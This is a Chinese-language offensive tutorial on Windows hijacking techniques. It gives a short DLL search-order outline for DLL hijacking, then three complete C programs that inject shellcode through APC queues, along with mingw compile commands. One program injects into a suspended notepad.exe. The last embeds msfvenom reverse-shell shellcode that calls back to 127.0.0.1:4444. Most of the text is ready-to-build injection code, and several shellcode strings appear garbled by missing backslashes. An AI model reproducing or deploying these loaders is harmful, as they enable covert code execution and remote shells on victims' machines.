03-劫持

01-DLL劫持

首先要了解DLL加载顺序

主要的几个位置：

1-应用程序安装目录

2-C:WindowsSystem32

3-C:WindowsSystem

4-C:Windows

5-当前工作目录

6-PATH环境变量目录（系统PATH、用户PATH）

Process Monitor设置监测选项

替换dll实现劫持，可能需要在win7 x64位机器上测试，win10下没成功

02-APC注入

过程：创建一个白进程使其暂停，使用VirtualAllocEx在白进程内开启内存空间，将shellcode写入开辟的内存，将开辟的内存写入线程APC队列，恢复线程运行，在APC队列里的代码就会运行：

#include <windows.h>
#include <stdio.h>
#include <stdlib.h>

// Payload in bytes, messagebox
unsigned char myPayload[] = 
"x48x31xc9x48x81xe9xdcxffxffxffx48x8dx05xefxff"
"xffxffx48xbbxd6x50xe0xd0x82x17x05xe9x48x31x58"
"x27x48x2dxf8xffxffxffxe2xf4x2ax18x61x34x72xe8"
"xfax16x3ex80xe0xd0x82x56x54xa8x86x02xb1x86xca"
"x26xd7x8cx9exdbxb2xb0xbcx5fx8exbbxcex6exa8x5b"
"xd0x37x3bxa1x5dx22xb0xeexcax18xb2xa3x9cx1dxd1"
"x19xcax26xc5x45xeax31x9cxd2xaex37x44x28x1fx5d"
"xa1xd1x43xf5xe8xbbx97x01xdex98x09x45x25xd7x5d"
"x12xdcx98x83xc7x3bx62x56xd8xe0xd0x82x5fx80x29"
"xa2x3fxa8xd1x52x47x3bx62x9ex48xdex94x09x57x25"
"xa0xd7x80x03x8cxcaxe8xccxd7x97xdbxd4x58xcax16"
"xd3xa4xe7x99xa8xe1x42xbbx44x28x1fx5dxa1xd1x43"
"x2fxe5x9cx27x6exacxd3xcex33x0dxacxefx81x95x06"
"xdax29x41x62x96x74xa9xd1x52x71x3bxa8x5dx5cxa8"
"xeexc6x9cx45xf5x9fx51x30xeexc3x9cx01x61x9ex51"
"x30x91xdax56x5dxb7x8fx0axa1x88xc3x4ex44xb3x9e"
"xd3x0cxf0xc3x45xfax09x8ex11xb9x8axbcx5fx8exfb"
"x3fx19x1fx2fx7dx4ax4cx2ex17x50xe0xd0x82x29x4d"
"x64x43xaexe0xd0x82x29x49x64x53x5axe1xd0x82x5f"
"x34x20x97xeaxa5x53xd4x10xfax3cx9ex61x29x91x38"
"xe7xb0x4bx80xafx35x98xe7x7bx69x86xf6x27x8fxa2"
"xeex73x05xd4x88x7excex8exbfx17x05xe9";

int main() {
  // Create a 64-bit process:
  STARTUPINFO startupInfo;
  PROCESS_INFORMATION processInfo;
  LPVOID myPayloadMem;
  SIZE_T myPayloadLen = sizeof(myPayload);
  LPCWSTR cmd;
  HANDLE processHandle, threadHandle;
  NTSTATUS status;

  ZeroMemory(&startupInfo, sizeof(startupInfo));
  ZeroMemory(&processInfo, sizeof(processInfo));
  startupInfo.cb = sizeof(startupInfo);

  CreateProcessA(
    "C:\Windows\System32\notepad.exe",
    NULL, NULL, NULL, FALSE,
    CREATE_SUSPENDED, NULL, NULL, &startupInfo, &processInfo
  );

  // Allow time to start/initialize.
  WaitForSingleObject(processInfo.hProcess, 50000);
  processHandle = processInfo.hProcess;
  threadHandle = processInfo.hThread;

  // Allocate memory for payload
  myPayloadMem = VirtualAllocEx(processHandle, NULL, myPayloadLen,
    MEM_COMMIT | MEM_RESERVE, PAGE_EXECUTE_READWRITE);

  // Write payload to allocated memory
  WriteProcessMemory(processHandle, myPayloadMem, myPayload, myPayloadLen, NULL);

  // Inject into the suspended thread.
  PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)myPayloadMem;
  QueueUserAPC((PAPCFUNC)apcRoutine, threadHandle, (ULONG_PTR)NULL);

  // Resume the suspended thread
  ResumeThread(threadHandle);

  return 0;
}

编译

x86_64-w64-mingw32-gcc apc-inject.c -o apc-inject.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

在windows10上运行

apc-inject.exe运行后会退出，弹窗是阻塞形式的，取消弹窗后记事本退出

使用NtTestAlert进行APC注入，在本进程的APC队列加入shellcode后调用NtTestAlert执行

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#pragma comment(lib, "ntdll")
using NtTestAlertFunction = NTSTATUS(NTAPI*)();

unsigned char shellcode[] = {
  0xfc, 0x48, 0x81, 0xe4, 0xf0, 0xff, 0xff, 0xff, 0xe8, 0xd0, 0x0, 0x0,
  0x0, 0x41, 0x51, 0x41, 0x50, 0x52, 0x51, 0x56, 0x48, 0x31, 0xd2, 0x65,
  0x48, 0x8b, 0x52, 0x60, 0x3e, 0x48, 0x8b, 0x52, 0x18, 0x3e, 0x48, 0x8b,
  0x52, 0x20, 0x3e, 0x48, 0x8b, 0x72, 0x50, 0x3e, 0x48, 0xf, 0xb7, 0x4a,
  0x4a, 0x4d, 0x31, 0xc9, 0x48, 0x31, 0xc0, 0xac, 0x3c, 0x61, 0x7c, 0x2,
  0x2c, 0x20, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0xe2, 0xed, 0x52,
  0x41, 0x51, 0x3e, 0x48, 0x8b, 0x52, 0x20, 0x3e, 0x8b, 0x42, 0x3c, 0x48,
  0x1, 0xd0, 0x3e, 0x8b, 0x80, 0x88, 0x0, 0x0, 0x0, 0x48, 0x85, 0xc0,
  0x74, 0x6f, 0x48, 0x1, 0xd0, 0x50, 0x3e, 0x8b, 0x48, 0x18, 0x3e, 0x44,
  0x8b, 0x40, 0x20, 0x49, 0x1, 0xd0, 0xe3, 0x5c, 0x48, 0xff, 0xc9, 0x3e,
  0x41, 0x8b, 0x34, 0x88, 0x48, 0x1, 0xd6, 0x4d, 0x31, 0xc9, 0x48, 0x31,
  0xc0, 0xac, 0x41, 0xc1, 0xc9, 0xd, 0x41, 0x1, 0xc1, 0x38, 0xe0, 0x75,
  0xf1, 0x3e, 0x4c, 0x3, 0x4c, 0x24, 0x8, 0x45, 0x39, 0xd1, 0x75, 0xd6,
  0x58, 0x3e, 0x44, 0x8b, 0x40, 0x24, 0x49, 0x1, 0xd0, 0x66, 0x3e, 0x41,
  0x8b, 0xc, 0x48, 0x3e, 0x44, 0x8b, 0x40, 0x1c, 0x49, 0x1, 0xd0, 0x3e,
  0x41, 0x8b, 0x4, 0x88, 0x48, 0x1, 0xd0, 0x41, 0x58, 0x41, 0x58, 0x5e,
  0x59, 0x5a, 0x41, 0x58, 0x41, 0x59, 0x41, 0x5a, 0x48, 0x83, 0xec, 0x20,
  0x41, 0x52, 0xff, 0xe0, 0x58, 0x41, 0x59, 0x5a, 0x3e, 0x48, 0x8b, 0x12,
  0xe9, 0x49, 0xff, 0xff, 0xff, 0x5d, 0x49, 0xc7, 0xc1, 0x0, 0x0, 0x0,
  0x0, 0x3e, 0x48, 0x8d, 0x95, 0xfe, 0x0, 0x0, 0x0, 0x3e, 0x4c, 0x8d,
  0x85, 0x9, 0x1, 0x0, 0x0, 0x48, 0x31, 0xc9, 0x41, 0xba, 0x45, 0x83,
  0x56, 0x7, 0xff, 0xd5, 0x48, 0x31, 0xc9, 0x41, 0xba, 0xf0, 0xb5, 0xa2,
  0x56, 0xff, 0xd5, 0x4d, 0x65, 0x6f, 0x77, 0x2d, 0x6d, 0x65, 0x6f, 0x77,
  0x21, 0x0, 0x3d, 0x5e, 0x2e, 0x2e, 0x5e, 0x3d, 0x0
  };

int main(int argc, char* argv[]) {
  SIZE_T shellcodeSize = sizeof(shellcode);
  HMODULE ntdllModule = GetModuleHandleA("ntdll");
  NtTestAlertFunction testAlert = (NtTestAlertFunction)(GetProcAddress(ntdllModule, "NtTestAlert"));

  LPVOID shellcodeMemory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(GetCurrentProcess(), shellcodeMemory, shellcode, shellcodeSize, NULL);

  PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellcodeMemory;
  QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
  testAlert();

  return 0;
}

编译

x86_64-w64-mingw32-g++ apc-inject2.c -o apc-inject2.exe -s -ffunction-sections -fdata-sections -Wno-write-strings -fno-exceptions -fmerge-all-constants -static-libstdc++ -static-libgcc

在windows10上运行，没有弹窗，原理没问题但好像弹窗没执行起来，换成反弹shell的shellcode就可以

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <windows.h>

#pragma comment(lib, "ntdll")
using NtTestAlertFunction = NTSTATUS(NTAPI*)();

//msfvenom -p windows/x64/shell_reverse_tcp LHOST=127.0.0.1 LPORT=4444 -f c
unsigned char shellcode[] = 
"xfcx48x83xe4xf0xe8xc0x00x00x00x41x51x41x50"
"x52x51x56x48x31xd2x65x48x8bx52x60x48x8bx52"
"x18x48x8bx52x20x48x8bx72x50x48x0fxb7x4ax4a"
"x4dx31xc9x48x31xc0xacx3cx61x7cx02x2cx20x41"
"xc1xc9x0dx41x01xc1xe2xedx52x41x51x48x8bx52"
"x20x8bx42x3cx48x01xd0x8bx80x88x00x00x00x48"
"x85xc0x74x67x48x01xd0x50x8bx48x18x44x8bx40"
"x20x49x01xd0xe3x56x48xffxc9x41x8bx34x88x48"
"x01xd6x4dx31xc9x48x31xc0xacx41xc1xc9x0dx41"
"x01xc1x38xe0x75xf1x4cx03x4cx24x08x45x39xd1"
"x75xd8x58x44x8bx40x24x49x01xd0x66x41x8bx0c"
"x48x44x8bx40x1cx49x01xd0x41x8bx04x88x48x01"
"xd0x41x58x41x58x5ex59x5ax41x58x41x59x41x5a"
"x48x83xecx20x41x52xffxe0x58x41x59x5ax48x8b"
"x12xe9x57xffxffxffx5dx49xbex77x73x32x5fx33"
"x32x00x00x41x56x49x89xe6x48x81xecxa0x01x00"
"x00x49x89xe5x49xbcx02x00x11x5cx7fx00x00x01"
"x41x54x49x89xe4x4cx89xf1x41xbax4cx77x26x07"
"xffxd5x4cx89xeax68x01x01x00x00x59x41xbax29"
"x80x6bx00xffxd5x50x50x4dx31xc9x4dx31xc0x48"
"xffxc0x48x89xc2x48xffxc0x48x89xc1x41xbaxea"
"x0fxdfxe0xffxd5x48x89xc7x6ax10x41x58x4cx89"
"xe2x48x89xf9x41xbax99xa5x74x61xffxd5x48x81"
"xc4x40x02x00x00x49xb8x63x6dx64x00x00x00x00"
"x00x41x50x41x50x48x89xe2x57x57x57x4dx31xc0"
"x6ax0dx59x41x50xe2xfcx66xc7x44x24x54x01x01"
"x48x8dx44x24x18xc6x00x68x48x89xe6x56x50x41"
"x50x41x50x41x50x49xffxc0x41x50x49xffxc8x4d"
"x89xc1x4cx89xc1x41xbax79xccx3fx86xffxd5x48"
"x31xd2x48xffxcax8bx0ex41xbax08x87x1dx60xff"
"xd5xbbxf0xb5xa2x56x41xbaxa6x95xbdx9dxffxd5"
"x48x83xc4x28x3cx06x7cx0ax80xfbxe0x75x05xbb"
"x47x13x72x6fx6ax00x59x41x89xdaxffxd5";


int main(int argc, char* argv[]) {
  SIZE_T shellcodeSize = sizeof(shellcode);
  HMODULE ntdllModule = GetModuleHandleA("ntdll");
  NtTestAlertFunction testAlert = (NtTestAlertFunction)(GetProcAddress(ntdllModule, "NtTestAlert"));

  LPVOID shellcodeMemory = VirtualAlloc(NULL, shellcodeSize, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
  WriteProcessMemory(GetCurrentProcess(), shellcodeMemory, shellcode, shellcodeSize, NULL);

  PTHREAD_START_ROUTINE apcRoutine = (PTHREAD_START_ROUTINE)shellcodeMemory;
  QueueUserAPC((PAPCFUNC)apcRoutine, GetCurrentThread(), NULL);
  testAlert();

  return 0;
}

加微信拉群分享更多学习资料